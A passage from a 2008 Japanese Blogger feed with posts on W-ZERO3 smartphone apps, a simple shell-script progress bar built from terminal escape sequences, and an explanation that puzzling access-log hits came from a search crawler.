/&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●バッチファイルを書く&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.forest.impress.co.jp/article/2007/12/21/mortscript.html"&gt;&lt;span style="color:#000000;"&gt;MortScript&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;いろいろできるみたいですねえ。&lt;br /&gt;いっつも決まった順番で起動しているものがあるとか、手作業でやるのが面倒臭い&lt;br /&gt;などという場合にはスクリプトを書いてみるのも一興。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;●MP3 Player&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8igRYQ31rD8/R8ZmR_n_2SI/AAAAAAAAACk/2Ho49VFfJNs/s1600-h/GSPlayer.png"&gt;&lt;span style="color:#000000;"&gt;&lt;img id="BLOGGER_PHOTO_ID_5171933681404598562" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/R8ZmR_n_2SI/AAAAAAAAACk/2Ho49VFfJNs/s200/GSPlayer.png" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="http://hp.vector.co.jp/authors/VA032810/"&gt;&lt;span style="color:#000000;"&gt;GreenSoftware　GSPlayer&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;Download (V2.28 Windows Mobile 5/6 PocketPC English version)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;どうやらGSPlayer が動作も軽くて定番みたい。&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;プレイリストも作成できます。&lt;br /&gt;音楽再生機として考えた場合、問題となるのはバッテリーの持ち具合。気がついたらいつの間にかバッテリー&lt;br /&gt;警告が、などということもあります。連続再生でだいたい４～５時間くらいでしょうか？電車通勤の間に利用することを考えれば十分です。&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●デバイスの状態を表示 &lt;/span&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_8igRYQ31rD8/R8Zmlvn_2TI/AAAAAAAAACs/0jn2QOo31PA/s1600-h/DeviceStatusonToday.png"&gt;&lt;span style="color:#000000;"&gt;&lt;img id="BLOGGER_PHOTO_ID_5171934020707014962" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://2.bp.blogspot.com/_8igRYQ31rD8/R8Zmlvn_2TI/AAAAAAAAACs/0jn2QOo31PA/s200/DeviceStatusonToday.png" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;という上記のような状態を避けるためにもバッテリー状況をいつでも見やすいところに表示しておきたい！という願望を叶えてくれるソフト。&lt;br /&gt;バッテリー以外にもディスクやメモリの使用量を教えてくれる。&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;a href="http://www.forest.impress.co.jp/article/2006/04/25/devicestatusontoday.html"&gt;&lt;span style="color:#000000;"&gt;Device Status on Today&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;●メールのシグネチャを消す&lt;br /&gt;&lt;br /&gt;W-ZERO3からメールを送ると sent from W-ZERO3 という文字が自動的に追加されます。&lt;br /&gt;これを解除するには ￥Windows￥STMailToggleMsg を実行して下さい。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div align="center"&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;&lt;a href="http://root99.blogspot.com/2008/03/advancedw-zero3esssh2.html"&gt;つづく&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;iframe style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" border="0" marginwidth="0" marginheight="0" src="http://rcm-jp.amazon.co.jp/e/cm?t=secblo-22&amp;amp;o=9&amp;amp;p=15&amp;amp;l=st1&amp;amp;mode=electronics-jp&amp;amp;search=W-ZERO3&amp;amp;fc1=000000&amp;amp;lt1=&amp;amp;lc1=3366FF&amp;amp;bg1=FFFFFF&amp;amp;f=ifr" frameborder="0" width="468" scrolling="no" height="240"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5550886365390077462-641416423814557907?l=root99.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://root99.blogspot.com/feeds/641416423814557907/comments/default' title='コメントの投稿'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5550886365390077462&amp;postID=641416423814557907' title='0 件のコメント'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/641416423814557907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/641416423814557907'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/2008/02/ws011sh-sslvpn-ssh.html' title='アドエス(WS011SH)で SSLVPN で SSH'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_8igRYQ31rD8/R7bl9Pn_2GI/AAAAAAAAAA8/wh8MHUNSkec/s72-c/WS011SH.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5550886365390077462.post-7827965638571454754</id><published>2008-02-05T01:04:00.011+09:00</published><updated>2012-01-31T12:08:54.888+09:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='UNIX shell　ProgressBar　プログレスバー'/><title type='text'>プログレスバー(進捗表示)をLinuxのShellで表示するには？</title><content type='html'>&lt;span style="color: rgb(0, 0, 0);"&gt;2012/01 追記&lt;br /&gt;再び自分の環境で必要になったので、そう言えば昔プログレスバー作ったなぁと思いググったら&lt;br /&gt;意外に需要があるようだ。ついでにソース表示を修正しとこう。&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;CISCOとか、ネットワーク機器のCONSOLEに繋いだ時に表示されるプログレスバー(進捗表示)を Shell で表示&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;してみると便利かな？　と思ったので作ってみた。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;まずは、 #vi BAR 　　　として/home/root99 に下記のshellを作成。&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;バーの表示はエスケープ・シーケンスを使うことにする。&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;ちなみに、　CLS="^[[2J"　　と定義した場合 shell中での CLS 実行は、 Ｃｌｅａｒ コマンドと同義である。&lt;/span&gt;&lt;br /&gt;&lt;hr /&gt;&lt;pre&gt;&lt;pre&gt;#!/bin/sh&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ESC='&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;^[&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;'&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;#  ^[&lt;/span&gt; は Ctrl+vの後 Esc を押すことで入力&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#########################&lt;br /&gt;# MAIN&lt;br /&gt;#########################&lt;br /&gt;if [ $# -eq 0 ]&lt;br /&gt;then&lt;br /&gt; echo "Error: not arg"&lt;br /&gt; echo "$0 ＜LINE＞ ＜%＞ ＜Return Row＞ ＜Return Column＞"&lt;br /&gt; echo "example: $0 20 10 30 1"&lt;br /&gt; exit 1&lt;br /&gt;fi&lt;br /&gt;LINE=$1&lt;br /&gt;PERC=$2&lt;br /&gt;RETL=$3&lt;br /&gt;RETC=$4&lt;br /&gt;&lt;br /&gt;chrV="####################################################################################################"&lt;br /&gt;chrS="____________________________________________________________________________________________________"&lt;br /&gt;printf "${ESC}[${LINE};1H["&lt;br /&gt;chrBAR=`echo "$chrV" | cut -c1-${PERC}`&lt;br /&gt;&lt;br /&gt;if [ $PERC -ge 100 ];then&lt;br /&gt; CNT=0&lt;br /&gt;else&lt;br /&gt;((CNT = 100 - ${PERC}))&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;chrSPC=`echo "$chrS" | cut -c1-${CNT}`&lt;br /&gt;&lt;br /&gt;if [ $CNT -ne 100 ] ;then&lt;br /&gt;printf "$chrBAR"&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;if [ $CNT -ne 0 ] ;then&lt;br /&gt;printf "$chrSPC"&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;printf "] [ ${PERC}%%]"&lt;br /&gt;printf "${ESC}[${RETL};${RETC}H"&lt;br /&gt;#EOF&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/pre&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;hr /&gt;&lt;br /&gt;#chmod 755 ./BAR&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;で実行権限をつける。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;./BAR プログラムの実行サンプル。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;table style="color: rgb(0, 0, 0);" bg="" width="500" border="1" cellpadding="1" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;span style="font-size:78%;"&gt;&lt;span style="color: rgb(51, 255, 51);font-family:courier new;" &gt;&lt;span style="color: rgb(0, 0, 0);"&gt;#!/bin/sh&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;CNT=0&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;while [ $CNT -le 100 ]&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;do&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;/home/root99/BAR 29 ${CNT} 30 1&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;#echo $CNT&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;((CNT = $CNT + 1))&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;done&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;サンプルを実行するとこんな風にぴゅーーっと進捗バーが進行。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;table style="color: rgb(0, 0, 0);" bg="" width="500" border="1" cellpadding="1" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;span style="font-size:78%;"&gt;&lt;span style="color: rgb(51, 255, 51);font-family:courier new;" &gt;&lt;span style="color: rgb(0, 0, 0);"&gt;[root99@/home/root99/]#./BAR_sample.sh&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;[#################　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　] [ 43%]&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;バックアップ取得などで、大体のサイズが予めわかっている場合は&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;CNT=`echo "scale=2;(${NOW} / ${MAX})* 100" | bc  sed "s/\\..*//"`&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;として、$CNT の値を　％の引数とすれば良い。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;s&gt;どうやら blogger は空白の処理が苦手っぽいので、shell 中でアンダーバー表示の&lt;/s&gt;&lt;/span&gt;&lt;br /&gt;&lt;s&gt;&lt;span style="font-size:85%;"&gt;部分は空白に脳内変換してください。。。&lt;/span&gt;&lt;/s&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a href="http://www.amazon.co.jp/exec/obidos/ASIN/4873112672/ref=nosim/secblo-22/" target="_blank"&gt;&lt;img alt="詳解 シェルスクリプト アーノルド ロビンス (著), ネルソン・H.F. ベーブ (著), Arnold Robbins (原著), Nelson H.F. Beebe (原著), 日向 あおい (翻訳) " src="http://ecx.images-amazon.com/images/I/51EAPCH56ML._BO2,204,203,200_PIsitb-dp-500-arrow,TopRight,45,-64_OU09_AA90_SH20_.jpg" width="90" border="0" height="90" /&gt;&lt;br /&gt;詳解 シェルスクリプト&lt;br /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5550886365390077462-7827965638571454754?l=root99.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://root99.blogspot.com/feeds/7827965638571454754/comments/default' title='コメントの投稿'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5550886365390077462&amp;postID=7827965638571454754' title='0 件のコメント'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/7827965638571454754'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/7827965638571454754'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/2008/02/shell.html' title='プログレスバー(進捗表示)をLinuxのShellで表示するには？'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5550886365390077462.post-2786630781031437410</id><published>2008-01-15T06:29:00.003+09:00</published><updated>2008-02-25T00:49:13.418+09:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='アクセス解析　ネットストーカー　クローラー'/><title type='text'>ネットストーカー？</title><content type='html'>221x251x239x234.ap221.ftth.ucom.ne.jp　(221.251.239.234)&lt;br /&gt;b132108.ppp.asahi-net.or.jp (202.213.132.108)&lt;br /&gt;のアクセスについて。&lt;br /&gt;&lt;a href="http://www.google.co.jp/search?num=100&amp;amp;hl=ja&amp;amp;safe=off&amp;amp;q=221x251x239x234.ap221.ftth.ucom.ne.jp%E3%80%80b132108.ppp.asahi-net.or.jp&amp;amp;btnG=%E6%A4%9C%E7%B4%A2&amp;amp;lr=" target="blank"&gt;google検索 [結果]&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;調べてみると、これらのアクセスが気になっている人がたくさんいるみたいだ。&lt;br /&gt;何でだか怒ってる人もいた。&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.google.co.jp/search?num=100&amp;amp;hl=ja&amp;amp;safe=off&amp;amp;q=mixi+%E8%AA%AD%E3%81%BF%E9%80%83%E3%81%92&amp;amp;btnG=%E6%A4%9C%E7%B4%A2&amp;amp;lr=" target="blank"&gt;mixi で読み逃げが許せない！&lt;/a&gt;なんて文化が生まれるくらいだから無理もない。&lt;br /&gt;&lt;br /&gt;確かに httpd の access_log を見たことが無いようなブログから入った人にしてみれば気持ち悪いこと&lt;br /&gt;なのかも知れないな。&lt;br /&gt;code red なんか過去の話だしね。&lt;br /&gt;&lt;br /&gt;結論から言うと&lt;br /&gt;&lt;a href="http://www.marsflag.com/" target="blank"&gt;http://www.marsflag.com/&lt;/a&gt;&lt;br /&gt;ここの&lt;a href="http://www.google.co.jp/search?num=100&amp;amp;hl=ja&amp;amp;safe=off&amp;amp;q=%E3%82%AF%E3%83%AD%E3%83%BC%E3%83%A9%E3%83%BC&amp;amp;btnG=%E6%A4%9C%E7%B4%A2&amp;amp;lr=" target="blank"&gt;クローラー(Crawler)&lt;/a&gt; が Windows クライアントを使用しているせい。&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8igRYQ31rD8/R4vdko_YKpI/AAAAAAAAAAw/OXN_fnMWPMw/s1600-h/marsattack.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://4.bp.blogspot.com/_8igRYQ31rD8/R4vdko_YKpI/AAAAAAAAAAw/OXN_fnMWPMw/s320/marsattack.png" alt="" id="BLOGGER_PHOTO_ID_5155457820003936914" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;検索結果で表示するための画像を pict.marsflag.com に取り込む際、複数のクライアントマシンが&lt;br /&gt;取得する仕掛けなんでしょうね。よく出来てると思います。&lt;br /&gt;&lt;br /&gt;「だったら User-Agent くらい変えてアクセスしろよ」って声が聞こえてきそうだけど、恐らく&lt;br /&gt;yahoo や google と違って、サイト表示そのものを取得しないと意味がないからでしょう。&lt;br /&gt;ブラウザーの種類を偽装したら見え方が違っちゃうサイトも多いですしね。&lt;br /&gt;&lt;pre&gt;個人的には xxxxxx.crawl.yahoo.net の方がよっぽどうざいと思うんだけど、身元が明らか&lt;br /&gt;だから安心なんでしょう。&lt;br /&gt;これの解決策は marsflag側のクライアントに REFERER をセットしてあげることだと思う&lt;br /&gt;んですけど、どうでしょね？&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign="top"&gt;&lt;a href="http://www.amazon.co.jp/exec/obidos/ASIN/B000H1QRHM/ref=nosim/secblo-22/" target="_blank"&gt;&lt;img src="http://ec2.images-amazon.com/images/I/611H5K1EC9L._AA90_.jpg" alt="" border="0" height="90" width="90" /&gt;&lt;/a&gt;&lt;p&gt;&lt;span style="font-size:78%;"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;br /&gt;マーズ・アタック!&lt;br /&gt;&lt;span style=""&gt;出演： ジャック・ニコルソン, グレン・クローズ 監督： ティム・バートン&lt;/span&gt;&lt;br /&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5550886365390077462-2786630781031437410?l=root99.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://root99.blogspot.com/feeds/2786630781031437410/comments/default' title='コメントの投稿'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5550886365390077462&amp;postID=2786630781031437410' title='0 件のコメント'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/2786630781031437410'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/2786630781031437410'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/2008/01/blog-post.html' title='ネットストーカー？'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_8igRYQ31rD8/R4vdko_YKpI/AAAAAAAAAAw/OXN_fnMWPMw/s72-c/marsattack.png' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
